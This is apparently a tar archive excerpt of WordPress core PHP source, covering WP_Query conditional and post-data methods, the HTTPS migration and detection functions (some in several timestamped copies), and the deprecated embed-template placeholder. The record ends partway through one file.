// Most likely case.
if ( 'posts' === get_option( 'show_on_front' ) && $this->is_home() ) {
return true;
} elseif ( 'page' === get_option( 'show_on_front' ) && get_option( 'page_on_front' )
&& $this->is_page( get_option( 'page_on_front' ) )
) {
return true;
} else {
return false;
}
}
/**
* Determines whether the query is for the blog homepage.
*
* This is the page which shows the time based blog content of your site.
*
* Depends on the site's "Front page displays" Reading Settings 'show_on_front' and 'page_for_posts'.
*
* If you set a static page for the front page of your site, this function will return
* true only on the page you set as the "Posts page".
*
* @since 3.1.0
*
* @see WP_Query::is_front_page()
*
* @return bool Whether the query is for the blog homepage.
*/
public function is_home() {
return (bool) $this->is_home;
}
/**
* Determines whether the query is for the Privacy Policy page.
*
* This is the page which shows the Privacy Policy content of your site.
*
* Depends on the site's "Change your Privacy Policy page" Privacy Settings 'wp_page_for_privacy_policy'.
*
* This function will return true only on the page you set as the "Privacy Policy page".
*
* @since 5.2.0
*
* @return bool Whether the query is for the Privacy Policy page.
*/
public function is_privacy_policy() {
if ( get_option( 'wp_page_for_privacy_policy' )
&& $this->is_page( get_option( 'wp_page_for_privacy_policy' ) )
) {
return true;
} else {
return false;
}
}
/**
* Determines whether the query is for an existing month archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing month archive.
*/
public function is_month() {
return (bool) $this->is_month;
}
/**
* Determines whether the query is for an existing single page.
*
* If the $page parameter is specified, this function will additionally
* check if the query is for one of the pages specified.
*
* @since 3.1.0
*
* @see WP_Query::is_single()
* @see WP_Query::is_singular()
*
* @param int|string|int[]|string[] $page Optional. Page ID, title, slug, path, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing single page.
*/
public function is_page( $page = '' ) {
if ( ! $this->is_page ) {
return false;
}
if ( empty( $page ) ) {
return true;
}
$page_obj = $this->get_queried_object();
if ( ! $page_obj ) {
return false;
}
$page = array_map( 'strval', (array) $page );
if ( in_array( (string) $page_obj->ID, $page, true ) ) {
return true;
} elseif ( in_array( $page_obj->post_title, $page, true ) ) {
return true;
} elseif ( in_array( $page_obj->post_name, $page, true ) ) {
return true;
} else {
foreach ( $page as $pagepath ) {
if ( ! strpos( $pagepath, '/' ) ) {
continue;
}
$pagepath_obj = get_page_by_path( $pagepath );
if ( $pagepath_obj && ( $pagepath_obj->ID === $page_obj->ID ) ) {
return true;
}
}
}
return false;
}
/**
* Determines whether the query is for a paged result and not for the first page.
*
* @since 3.1.0
*
* @return bool Whether the query is for a paged result.
*/
public function is_paged() {
return (bool) $this->is_paged;
}
/**
* Determines whether the query is for a post or page preview.
*
* @since 3.1.0
*
* @return bool Whether the query is for a post or page preview.
*/
public function is_preview() {
return (bool) $this->is_preview;
}
/**
* Determines whether the query is for the robots.txt file.
*
* @since 3.1.0
*
* @return bool Whether the query is for the robots.txt file.
*/
public function is_robots() {
return (bool) $this->is_robots;
}
/**
* Determines whether the query is for the favicon.ico file.
*
* @since 5.4.0
*
* @return bool Whether the query is for the favicon.ico file.
*/
public function is_favicon() {
return (bool) $this->is_favicon;
}
/**
* Determines whether the query is for a search.
*
* @since 3.1.0
*
* @return bool Whether the query is for a search.
*/
public function is_search() {
return (bool) $this->is_search;
}
/**
* Determines whether the query is for an existing single post.
*
* Works for any post type excluding pages.
*
* If the $post parameter is specified, this function will additionally
* check if the query is for one of the Posts specified.
*
* @since 3.1.0
*
* @see WP_Query::is_page()
* @see WP_Query::is_singular()
*
* @param int|string|int[]|string[] $post Optional. Post ID, title, slug, path, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing single post.
*/
public function is_single( $post = '' ) {
if ( ! $this->is_single ) {
return false;
}
if ( empty( $post ) ) {
return true;
}
$post_obj = $this->get_queried_object();
if ( ! $post_obj ) {
return false;
}
$post = array_map( 'strval', (array) $post );
if ( in_array( (string) $post_obj->ID, $post, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_title, $post, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_name, $post, true ) ) {
return true;
} else {
foreach ( $post as $postpath ) {
if ( ! strpos( $postpath, '/' ) ) {
continue;
}
$postpath_obj = get_page_by_path( $postpath, OBJECT, $post_obj->post_type );
if ( $postpath_obj && ( $postpath_obj->ID === $post_obj->ID ) ) {
return true;
}
}
}
return false;
}
/**
* Determines whether the query is for an existing single post of any post type
* (post, attachment, page, custom post types).
*
* If the $post_types parameter is specified, this function will additionally
* check if the query is for one of the Posts Types specified.
*
* @since 3.1.0
*
* @see WP_Query::is_page()
* @see WP_Query::is_single()
*
* @param string|string[] $post_types Optional. Post type or array of post types
* to check against. Default empty.
* @return bool Whether the query is for an existing single post
* or any of the given post types.
*/
public function is_singular( $post_types = '' ) {
if ( empty( $post_types ) || ! $this->is_singular ) {
return (bool) $this->is_singular;
}
$post_obj = $this->get_queried_object();
if ( ! $post_obj ) {
return false;
}
return in_array( $post_obj->post_type, (array) $post_types, true );
}
/**
* Determines whether the query is for a specific time.
*
* @since 3.1.0
*
* @return bool Whether the query is for a specific time.
*/
public function is_time() {
return (bool) $this->is_time;
}
/**
* Determines whether the query is for a trackback endpoint call.
*
* @since 3.1.0
*
* @return bool Whether the query is for a trackback endpoint call.
*/
public function is_trackback() {
return (bool) $this->is_trackback;
}
/**
* Determines whether the query is for an existing year archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing year archive.
*/
public function is_year() {
return (bool) $this->is_year;
}
/**
* Determines whether the query is a 404 (returns no results).
*
* @since 3.1.0
*
* @return bool Whether the query is a 404 error.
*/
public function is_404() {
return (bool) $this->is_404;
}
/**
* Determines whether the query is for an embedded post.
*
* @since 4.4.0
*
* @return bool Whether the query is for an embedded post.
*/
public function is_embed() {
return (bool) $this->is_embed;
}
/**
* Determines whether the query is the main query.
*
* @since 3.3.0
*
* @global WP_Query $wp_the_query WordPress Query object.
*
* @return bool Whether the query is the main query.
*/
public function is_main_query() {
global $wp_the_query;
return $wp_the_query === $this;
}
/**
* Sets up global post data.
*
* @since 4.1.0
* @since 4.4.0 Added the ability to pass a post ID to `$post`.
*
* @global int $id
* @global WP_User $authordata
* @global string $currentday
* @global string $currentmonth
* @global int $page
* @global array $pages
* @global int $multipage
* @global int $more
* @global int $numpages
*
* @param WP_Post|object|int $post WP_Post instance or Post ID/object.
* @return true True when finished.
*/
public function setup_postdata( $post ) {
global $id, $authordata, $currentday, $currentmonth, $page, $pages, $multipage, $more, $numpages;
if ( ! ( $post instanceof WP_Post ) ) {
$post = get_post( $post );
}
if ( ! $post ) {
return;
}
$elements = $this->generate_postdata( $post );
if ( false === $elements ) {
return;
}
$id = $elements['id'];
$authordata = $elements['authordata'];
$currentday = $elements['currentday'];
$currentmonth = $elements['currentmonth'];
$page = $elements['page'];
$pages = $elements['pages'];
$multipage = $elements['multipage'];
$more = $elements['more'];
$numpages = $elements['numpages'];
/**
* Fires once the post data has been set up.
*
* @since 2.8.0
* @since 4.1.0 Introduced `$query` parameter.
*
* @param WP_Post $post The Post object (passed by reference).
* @param WP_Query $query The current Query object (passed by reference).
*/
do_action_ref_array( 'the_post', array( &$post, &$this ) );
return true;
}
/**
* Generates post data.
*
* @since 5.2.0
*
* @param WP_Post|object|int $post WP_Post instance or Post ID/object.
* @return array|false Elements of post or false on failure.
*/
public function generate_postdata( $post ) {
if ( ! ( $post instanceof WP_Post ) ) {
$post = get_post( $post );
}
if ( ! $post ) {
return false;
}
$id = (int) $post->ID;
$authordata = get_userdata( $post->post_author );
$currentday = false;
$currentmonth = false;
$post_date = $post->post_date;
if ( ! empty( $post_date ) && '0000-00-00 00:00:00' !== $post_date ) {
// Avoid using mysql2date for performance reasons.
$currentmonth = substr( $post_date, 5, 2 );
$day = substr( $post_date, 8, 2 );
$year = substr( $post_date, 2, 2 );
$currentday = sprintf( '%s.%s.%s', $day, $currentmonth, $year );
}
$numpages = 1;
$multipage = 0;
$page = $this->get( 'page' );
if ( ! $page ) {
$page = 1;
}
/*
* Force full post content when viewing the permalink for the $post,
* or when on an RSS feed. Otherwise respect the 'more' tag.
*/
if ( get_queried_object_id() === $post->ID && ( $this->is_page() || $this->is_single() ) ) {
$more = 1;
} elseif ( $this->is_feed() ) {
$more = 1;
} else {
$more = 0;
}
$content = $post->post_content;
if ( str_contains( $content, '<!--nextpage-->' ) ) {
$content = str_replace( "\n<!--nextpage-->\n", '<!--nextpage-->', $content );
$content = str_replace( "\n<!--nextpage-->", '<!--nextpage-->', $content );
$content = str_replace( "<!--nextpage-->\n", '<!--nextpage-->', $content );
// Remove the nextpage block delimiters, to avoid invalid block structures in the split content.
$content = str_replace( '<!-- wp:nextpage -->', '', $content );
$content = str_replace( '<!-- /wp:nextpage -->', '', $content );
// Ignore nextpage at the beginning of the content.
if ( str_starts_with( $content, '<!--nextpage-->' ) ) {
$content = substr( $content, 15 );
}
$pages = explode( '<!--nextpage-->', $content );
} else {
$pages = array( $post->post_content );
}
/**
* Filters the "pages" derived from splitting the post content.
*
* "Pages" are determined by splitting the post content based on the presence
* of `<!-- nextpage -->` tags.
*
* @since 4.4.0
*
* @param string[] $pages Array of "pages" from the post content split by `<!-- nextpage -->` tags.
* @param WP_Post $post Current post object.
*/
$pages = apply_filters( 'content_pagination', $pages, $post );
$numpages = count( $pages );
if ( $numpages > 1 ) {
if ( $page > 1 ) {
$more = 1;
}
$multipage = 1;
} else {
$multipage = 0;
}
$elements = compact( 'id', 'authordata', 'currentday', 'currentmonth', 'page', 'pages', 'multipage', 'more', 'numpages' );
return $elements;
}
/**
* Generates cache key.
*
* @since 6.1.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $args Query arguments.
* @param string $sql SQL statement.
* @return string Cache key.
*/
protected function generate_cache_key( array $args, $sql ) {
global $wpdb;
unset(
$args['cache_results'],
$args['fields'],
$args['lazy_load_term_meta'],
$args['update_post_meta_cache'],
$args['update_post_term_cache'],
$args['update_menu_item_cache'],
$args['suppress_filters']
);
if ( empty( $args['post_type'] ) ) {
if ( $this->is_attachment ) {
$args['post_type'] = 'attachment';
} elseif ( $this->is_page ) {
$args['post_type'] = 'page';
} else {
$args['post_type'] = 'post';
}
} elseif ( 'any' === $args['post_type'] ) {
$args['post_type'] = array_values( get_post_types( array( 'exclude_from_search' => false ) ) );
}
$args['post_type'] = (array) $args['post_type'];
// Sort post types to ensure same cache key generation.
sort( $args['post_type'] );
/*
* Sort arrays that can be used for ordering prior to cache key generation.
*
* These arrays are sorted in the query generator for the purposes of the
* WHERE clause but the arguments are not modified as they can be used for
* the orderby clause.
*
* Their use in the orderby clause will generate a different SQL query so
* they can be sorted for the cache key generation.
*/
$sortable_arrays_with_int_values = array(
'post__in',
'post_parent__in',
);
foreach ( $sortable_arrays_with_int_values as $key ) {
if ( isset( $args[ $key ] ) && is_array( $args[ $key ] ) ) {
$args[ $key ] = array_unique( array_map( 'absint', $args[ $key ] ) );
sort( $args[ $key ] );
}
}
// Sort and unique the 'post_name__in' for cache key generation.
if ( isset( $args['post_name__in'] ) && is_array( $args['post_name__in'] ) ) {
$args['post_name__in'] = array_unique( $args['post_name__in'] );
sort( $args['post_name__in'] );
}
if ( isset( $args['post_status'] ) ) {
$args['post_status'] = (array) $args['post_status'];
// Sort post status to ensure same cache key generation.
sort( $args['post_status'] );
}
// Add a default orderby value of date to ensure same cache key generation.
if ( ! isset( $args['orderby'] ) ) {
$args['orderby'] = 'date';
}
$placeholder = $wpdb->placeholder_escape();
array_walk_recursive(
$args,
/*
* Replace wpdb placeholders with the string used in the database
* query to avoid unreachable cache keys. This is necessary because
* the placeholder is randomly generated in each request.
*
* $value is passed by reference to allow it to be modified.
* array_walk_recursive() does not return an array.
*/
static function ( &$value ) use ( $wpdb, $placeholder ) {
if ( is_string( $value ) && str_contains( $value, $placeholder ) ) {
$value = $wpdb->remove_placeholder_escape( $value );
}
}
);
ksort( $args );
// Replace wpdb placeholder in the SQL statement used by the cache key.
$sql = $wpdb->remove_placeholder_escape( $sql );
$key = md5( serialize( $args ) . $sql );
$this->query_cache_key = "wp_query:$key";
return $this->query_cache_key;
}
/**
* After looping through a nested query, this function
* restores the $post global to the current post in this query.
*
* @since 3.7.0
*
* @global WP_Post $post Global post object.
*/
public function reset_postdata() {
if ( ! empty( $this->post ) ) {
$GLOBALS['post'] = $this->post;
$this->setup_postdata( $this->post );
}
}
/**
* Lazyloads term meta for posts in the loop.
*
* @since 4.4.0
* @deprecated 4.5.0 See wp_queue_posts_for_term_meta_lazyload().
*
* @param mixed $check
* @param int $term_id
* @return mixed
*/
public function lazyload_term_meta( $check, $term_id ) {
_deprecated_function( __METHOD__, '4.5.0' );
return $check;
}
/**
* Lazyloads comment meta for comments in the loop.
*
* @since 4.4.0
* @deprecated 4.5.0 See wp_lazyload_comment_meta().
*
* @param mixed $check
* @param int $comment_id
* @return mixed
*/
public function lazyload_comment_meta( $check, $comment_id ) {
_deprecated_function( __METHOD__, '4.5.0' );
return $check;
}
}
https-migration-20260605140532-20260621225911.php 0000666 00000011205 15224151220 0013350 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605114228-20260621081205.php 0000666 00000011205 15224151220 0013347 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605193309-20260621081205.php 0000666 00000013341 15224151220 0013346 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605111908-20260621081113-20260621192650.php 0000666 00000011205 15224151220 0014736 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
embed-template.php 0000666 00000000522 15224151220 0010137 0 ustar 00 <?php
/**
* Back-compat placeholder for the base embed template
*
* @package WordPress
* @subpackage oEmbed
* @since 4.4.0
* @deprecated 4.5.0 Moved to wp-includes/theme-compat/embed.php
*/
_deprecated_file( basename( __FILE__ ), '4.5.0', WPINC . '/theme-compat/embed.php' );
require ABSPATH . WPINC . '/theme-compat/embed.php';
https-detection-20260605100735-20260621081107-20260621180949.php 0000666 00000013341 15224151220 0014735 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
